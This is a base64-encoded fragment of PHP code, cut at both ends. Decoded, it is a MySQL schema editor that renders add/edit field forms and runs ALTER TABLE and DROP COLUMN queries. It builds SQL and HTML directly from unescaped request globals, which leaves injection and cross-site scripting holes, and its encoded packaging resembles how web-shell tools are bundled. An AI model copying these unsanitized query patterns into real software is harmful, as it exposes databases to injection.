WdlRmllbGQoICRjbWQgKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJGZpZWxkbmFtZSwgJFBIUF9TRUxGOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGgxPkFkZCBGaWVsZDwvaDE+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQllY2hvICI8aDE+RWRpdCBGaWVsZDwvaDE+XG4iOw0KCQkkcFJlc3VsdCA9IG15c3FsX2RiX3F1ZXJ5KCAkZGJuYW1lLCAiU0hPVyBmaWVsZHMgRlJPTSAkdGFibGVuYW1lIiApOw0KCQkkbnVtID0gbXlzcWxfbnVtX3Jvd3MoICRwUmVzdWx0ICk7DQoJCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCQkkZmllbGQgPSBteXNxbF9mZXRjaF9hcnJheSggJHBSZXN1bHQgKTsNCgkJCWlmKCAkZmllbGRbIkZpZWxkIl0gPT0gJGZpZWxkbmFtZSApIHsNCgkJCQkkZmllbGR0eXBlID0gJGZpZWxkWyJUeXBlIl07DQoJCQkJJGZpZWxka2V5ID0gJGZpZWxkWyJLZXkiXTsNCgkJCQkkZmllbGRleHRyYSA9ICRmaWVsZFsiRXh0cmEiXTsNCgkJCQkkZmllbGRudWxsID0gJGZpZWxkWyJOdWxsIl07DQoJCQkJJGZpZWxkZGVmYXVsdCA9ICRmaWVsZFsiRGVmYXVsdCJdOw0KCQkJCWJyZWFrOw0KCQkJfQ0KCQl9DQoNCgkJJHR5cGUgPSBzdHJ0b2soICRmaWVsZHR5cGUsICIgKCwpXG4iICk7DQoJCWlmKCBzdHJwb3MoICRmaWVsZHR5cGUsICIoIiApICkgew0KCQkJaWYoICR0eXBlID09ICJlbnVtIiB8ICR0eXBlID09ICJzZXQiICkgew0KCQkJCSR2YWx1ZWxpc3QgPSBzdHJ0b2soICIgKClcbiIgKTsNCgkJCX0gZWxzZSB7DQoJCQkJJE0gPSBzdHJ0b2soICIgKCwpXG4iICk7DQoJCQkJaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgIiwiICkgKQ0KCQkJCQkkRCA9IHN0cnRvayggIiAoLClcbiIgKTsNCgkJCX0NCgkJfQ0KCX0NCg0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvICI8Zm9ybSBhY3Rpb249JFBIUF9TRUxGPlxuIjsNCglpZiggJGNtZCA9PSAiYWRkIiApDQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWFjdGlvbiB2YWx1ZT1hZGRGaWVsZF9zdWJtaXQ+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9ZWRpdEZpZWxkX3N1Ym1pdD5cbiI7DQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPW9sZF9uYW1lIHZhbHVlPSRmaWVsZG5hbWU+XG4iOw0KCX0NCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1kYm5hbWUgdmFsdWU9JGRibmFtZT5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9dGFibGVuYW1lIHZhbHVlPSR0YWJsZW5hbWU+XG4iOw0KCWVjaG8gIjxoMz5OYW1lPC9oMz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9dGV4dCBuYW1lPW5hbWUgdmFsdWU9JGZpZWxkbmFtZT48cD5cbiI7DQoJZWNobyAnDQoNCjxoMz5UeXBlPC9oMz4NCjxmb250IHNpemU9MiBjbGFzcz0ibmV3Ij4NCiogYE1cJyBpbmRpY2F0ZXMgdGhlIG1heGltdW0gZGlzcGxheSBzaXplLjxicj4NCiogYERcJyBhcHBsaWVzIHRvIGZsb2F0aW5nLXBvaW50IHR5cGVzIGFuZCBpbmRpY2F0ZXMgdGhlIG51bWJlciBvZiBkaWdpdHMgZm9sbG93aW5nIHRoZSBkZWNpbWFsIHBvaW50Ljxicj4NCjwvZm9udD4NCjx0YWJsZT4NCjx0cj4NCjx0aD5UeXBlPC90aD48dGg+Jm5ic3BNJm5ic3A8L3RoPjx0aD4mbmJzcEQmbmJzcDwvdGg+PHRoPnVuc2lnbmVkPC90aD48dGg+emVyb2ZpbGw8L3RoPjx0aD5iaW5hcnk8L3RoPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTllJTlQiICc7IGlmKCAkdHlwZSA9PSAidGlueWludCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElOWUlOVCAoLTEyOCB+IDEyNyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iU01BTExJTlQiICc7IGlmKCAkdHlwZSA9PSAic21hbGxpbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlNNQUxMSU5UICgtMzI3NjggfiAzMjc2Nyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iTUVESVVNSU5UIiAnOyBpZiggJHR5cGUgPT0gIm1lZGl1bWludCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TUVESVVNSU5UICgtODM4ODYwOCB+IDgzODg2MDcpPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IklOVCIgJzsgaWYoICR0eXBlID09ICJpbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPklOVCAoLTIxNDc0ODM2NDggfiAyMTQ3NDgzNjQ3KTwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJCSUdJTlQiICc7IGlmKCAkdHlwZSA9PSAiYmlnaW50IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5CSUdJTlQgKC05MjIzMzcyMDM2ODU0Nzc1ODA4IH4gOTIyMzM3MjAzNjg1NDc3NTgwNyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iRkxPQVQiICc7IGlmKCAkdHlwZSA9PSAiZmxvYXQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkZMT0FUPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkRPVUJMRSIgJzsgaWYoICR0eXBlID09ICJkb3VibGUiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRPVUJMRTwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJERUNJTUFMIiAnOyBpZiggJHR5cGUgPT0gImRlY2ltYWwiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRFQ0lNQUwoTlVNRVJJQyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iREFURSIgJzsgaWYoICR0eXBlID09ICJkYXRlIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5EQVRFICgxMDAwLTAxLTAxIH4gOTk5OS0xMi0zMSwgWVlZWS1NTS1ERCk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iREFURVRJTUUiICc7IGlmKCAkdHlwZSA9PSAiZGF0ZXRpbWUiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRBVEVUSU1FICgxMDAwLTAxLTAxIDAwOjAwOjAwIH4gOTk5OS0xMi0zMSAyMzo1OTo1OSwgWVlZWS1NTS1ERCBISDpNTTpTUyk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iVElNRVNUQU1QIiAnOyBpZiggJHR5cGUgPT0gInRpbWVzdGFtcCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElNRVNUQU1QICgxOTcwLTAxLTAxIDAwOjAwOjAwIH4gMjEwNi4uLiwgWVlZWU1NRERbSEhbTU1bU1NdXV0pPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTUUiICc7IGlmKCAkdHlwZSA9PSAidGltZSIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElNRSAoLTgzODo1OTo1OSB+IDgzODo1OTo1OSwgSEg6TU06U1MpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IllFQVIiICc7IGlmKCAkdHlwZSA9PSAieWVhciIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+WUVBUiAoMTkwMSB+IDIxNTUsIDAwMDAsIFlZWVkpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkNIQVIiICc7IGlmKCAkdHlwZSA9PSAiY2hhciIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+Q0hBUjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJWQVJDSEFSIiAnOyBpZiggJHR5cGUgPT0gInZhcmNoYXIiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlZBUkNIQVI8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iVElOWVRFWFQiICc7IGlmKCAkdHlwZSA9PSAidGlueXRleHQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlRJTllURVhUICgwIH4gMjU1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJURVhUIiAnOyBpZiggJHR5cGUgPT0gInRleHQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlRFWFQgKDAgfiA2NTUzNSk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iTUVESVVNVEVYVCIgJzsgaWYoICR0eXBlID09ICJtZWRpdW10ZXh0IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5NRURJVU1URVhUICgwIH4gMTY3NzcyMTUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkxPTkdURVhUIiAnOyBpZiggJHR5cGUgPT0gImxvbmd0ZXh0IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5MT05HVEVYVCAoMCB+IDQyOTQ5NjcyOTUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTllCTE9CIiAnOyBpZiggJHR5cGUgPT0gInRpbnlibG9iIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5USU5ZQkxPQiAoMCB+IDI1NSk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iQkxPQiIgJzsgaWYoICR0eXBlID09ICJibG9iIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5CTE9CICgwIH4gNjU1MzUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9Ik1FRElVTUJMT0IiICc7IGlmKCAkdHlwZSA9PSAibWVkaXVtYmxvYiIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TUVESVVNQkxPQiAoMCB+IDE2Nzc3MjE1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJMT05HQkxPQiIgJzsgaWYoICR0eXBlID09ICJsb25nYmxvYiIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TE9OR0JMT0IgKDAgfiA0Mjk0OTY3Mjk1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJFTlVNIiAnOyBpZiggJHR5cGUgPT0gImVudW0iICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkVOVU08L3RkPg0KPHRkIGNvbHNwYW49NT48Y2VudGVyPnZhbHVlIGxpc3Q8L2NlbnRlcj48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlNFVCIgJzsgaWYoICR0eXBlID09ICJzZXQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlNFVDwvdGQ+DQo8dGQgY29sc3Bhbj01PjxjZW50ZXI+dmFsdWUgbGlzdDwvY2VudGVyPjwvdGQ+DQo8L3RyPg0KPC90YWJsZT4NCjx0YWJsZT4NCjx0cj48dGg+TTwvdGg+PHRoPkQ8L3RoPjx0aD51bnNpZ25lZDwvdGg+PHRoPnplcm9maWxsPC90aD48dGg+YmluYXJ5PC90aD48dGg+dmFsdWUgbGlzdCAoZXg6IFwnYXBwbGVcJywgXCdvcmFuZ2VcJywgXCdiYW5hbmFcJykgPC90aD48L3RyPg0KPHRyPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT10ZXh0IHNpemU9NCBuYW1lPU0gJzsgaWYoICRNICE9ICIiICkgZWNobyAidmFsdWU9JE0iO2VjaG8gJz48L3RkPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT10ZXh0IHNpemU9NCBuYW1lPUQgJzsgaWYoICREICE9ICIiICkgZWNobyAidmFsdWU9JEQiO2VjaG8gJz48L3RkPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT1jaGVja2JveCBuYW1lPXVuc2lnbmVkIHZhbHVlPSJVTlNJR05FRCIgJzsgaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgInVuc2lnbmVkIiApICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPjxpbnB1dCB0eXBlPWNoZWNrYm94IG5hbWU9emVyb2ZpbGwgdmFsdWU9IlpFUk9GSUxMIiAnOyBpZiggc3RycG9zKCAkZmllbGR0eXBlLCAiemVyb2ZpbGwiICkgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9Y2hlY2tib3ggbmFtZT1iaW5hcnkgdmFsdWU9IkJJTkFSWSIgJzsgaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgImJpbmFyeSIgKSAgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9dGV4dCBzaXplPTYwIG5hbWU9dmFsdWVsaXN0ICc7IGlmKCAkdmFsdWVsaXN0ICE9ICIiICkgZWNobyAidmFsdWU9XCIkdmFsdWVsaXN0XCIiO2VjaG8gJz48L3RkPg0KPC90cj4NCjwvdGFibGU+DQo8aDM+RmxhZ3M8L2gzPg0KPHRhYmxlPg0KPHRyPjx0aD5ub3QgbnVsbDwvdGg+PHRoPmRlZmF1bHQgdmFsdWU8L3RoPjx0aD5hdXRvIGluY3JlbWVudDwvdGg+PHRoPnByaW1hcnkga2V5PC90aD48L3RyPg0KPHRyPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT1jaGVja2JveCBuYW1lPW5vdF9udWxsIHZhbHVlPSJOT1QgTlVMTCIgJzsgaWYoICRmaWVsZG51bGwgIT0gIllFUyIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9dGV4dCBuYW1lPWRlZmF1bHRfdmFsdWUgJzsgaWYoICRmaWVsZGRlZmF1bHQgIT0gIiIgKSBlY2hvICJ2YWx1ZT0kZmllbGRkZWZhdWx0IjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9Y2hlY2tib3ggbmFtZT1hdXRvX2luY3JlbWVudCB2YWx1ZT0iQVVUT19JTkNSRU1FTlQiICc7IGlmKCAkZmllbGRleHRyYSA9PSAiYXV0b19pbmNyZW1lbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPjxpbnB1dCB0eXBlPWNoZWNrYm94IG5hbWU9cHJpbWFyeV9rZXkgdmFsdWU9IlBSSU1BUlkgS0VZIiAnOyBpZiggJGZpZWxka2V5ID09ICJQUkkiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8L3RyPg0KPC90YWJsZT4NCjxwPic7DQoJaWYoICRjbWQgPT0gImFkZCIgKQ0KCQllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0FkZCBGaWVsZCc+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdFZGl0IEZpZWxkJz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9YnV0dG9uIHZhbHVlPUNhbmNlbCBvbkNsaWNrPSdoaXN0b3J5LmJhY2soKSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQp9DQoNCmZ1bmN0aW9uIG1hbmFnZUZpZWxkX3N1Ym1pdCggJGNtZCApIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkb2xkX25hbWUsICRuYW1lLCAkdHlwZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2csDQoJCSRNLCAkRCwgJHVuc2lnbmVkLCAkemVyb2ZpbGwsICRiaW5hcnksICRub3RfbnVsbCwgJGRlZmF1bHRfdmFsdWUsICRhdXRvX2luY3JlbWVudCwgJHByaW1hcnlfa2V5LCAkdmFsdWVsaXN0Ow0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJJHF1ZXJ5U3RyID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgQUREICRuYW1lICI7DQoJZWxzZSBpZiggJGNtZCA9PSAiZWRpdCIgKQ0KCQkkcXVlcnlTdHIgPSAiQUxURVIgVEFCTEUgJHRhYmxlbmFtZSBDSEFOR0UgJG9sZF9uYW1lICRuYW1lICI7DQoJaWYoICRNICE9ICIiICkNCgkJaWYoICREICE9ICIiICkNCgkJCSRxdWVyeVN0ciAuPSAiJHR5cGUoJE0sJEQpICI7DQoJCWVsc2UNCgkJCSRxdWVyeVN0ciAuPSAiJHR5cGUoJE0pICI7DQoJZWxzZSBpZiggJHZhbHVlbGlzdCAhPSAiIiApIHsNCgkJJHZhbHVlbGlzdCA9IHN0cmlwc2xhc2hlcyggJHZhbHVlbGlzdCApOw0KCQkkcXVlcnlTdHIgLj0gIiR0eXBlKCR2YWx1ZWxpc3QpICI7DQoJfSBlbHNlDQoJCSRxdWVyeVN0ciAuPSAiJHR5cGUgIjsNCgkkcXVlcnlTdHIgLj0gIiR1bnNpZ25lZCAkemVyb2ZpbGwgJGJpbmFyeSAiOw0KCWlmKCAkZGVmYXVsdF92YWx1ZSAhPSAiIiApDQoJCSRxdWVyeVN0ciAuPSAiREVGQVVMVCAnJGRlZmF1bHRfdmFsdWUnICI7DQoJJHF1ZXJ5U3RyIC49ICIkbm90X251bGwgJGF1dG9faW5jcmVtZW50IjsNCglteXNxbF9zZWxlY3RfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIsICRteXNxbEhhbmRsZSApOw0KCSRlcnJNc2cgPSBteXNxbF9lcnJvcigpOw0KCS8vIGtleSBjaGFuZ2UNCgkka2V5Q2hhbmdlID0gZmFsc2U7DQoJJHJlc3VsdCA9IG15c3FsX3F1ZXJ5KCAiU0hPVyBLRVlTIEZST00gJHRhYmxlbmFtZSIgKTsNCgkkcHJpbWFyeSA9ICIiOw0KCXdoaWxlKCAkcm93ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHJlc3VsdCkgKQ0KCQlpZiggJHJvd1siS2V5X25hbWUiXSA9PSAiUFJJTUFSWSIgKSB7DQoJCQlpZiggJHJvd1tDb2x1bW5fbmFtZV0gPT0gJG5hbWUgKQ0KCQkJCSRrZXlDaGFuZ2UgPSB0cnVlOw0KCQkJZWxzZQ0KCQkJCSRwcmltYXJ5IC49ICIsICRyb3dbQ29sdW1uX25hbWVdIjsNCgkJfQ0KCWlmKCAkcHJpbWFyeV9rZXkgPT0gIlBSSU1BUlkgS0VZIiApIHsNCgkJJHByaW1hcnkgLj0gIiwgJG5hbWUiOw0KCQkka2V5Q2hhbmdlID0gISRrZXlDaGFuZ2U7DQoJfQ0KCSRwcmltYXJ5ID0gc3Vic3RyKCAkcHJpbWFyeSwgMiApOw0KCWlmKCAka2V5Q2hhbmdlID09IHRydWUgKSB7DQoJCSRxID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgRFJPUCBQUklNQVJZIEtFWSI7DQoJCW15c3FsX3F1ZXJ5KCAkcSApOw0KCQkkcXVlcnlTdHIgLj0gIjxicj5cbiIgLiAkcTsNCgkJJGVyck1zZyAuPSAiPGJyPlxuIiAuIG15c3FsX2Vycm9yKCk7DQoJCSRxID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgQUREIFBSSU1BUlkgS0VZKCAkcHJpbWFyeSApIjsNCgkJbXlzcWxfcXVlcnkoICRxICk7DQoJCSRxdWVyeVN0ciAuPSAiPGJyPlxuIiAuICRxOw0KCQkkZXJyTXNnIC49ICI8YnI+XG4iIC4gbXlzcWxfZXJyb3IoKTsNCgl9DQoJdmlld1NjaGVtYSgpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wRmllbGQoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJGZpZWxkbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgRFJPUCBDT0xVTU4gJGZpZWxkbmFtZSI7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglteXNxbF9xdWVyeSggJHF1ZXJ5U3RyICwgJG15c3FsSGFuZGxlICk7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJdmlld1NjaGVtYSgpOw0KfQ0KDQpmdW5jdGlvbiB2aWV3RGF0YSggJHF1ZXJ5U3RyICkgew0KCWdsb2JhbCAkYWN0aW9uLC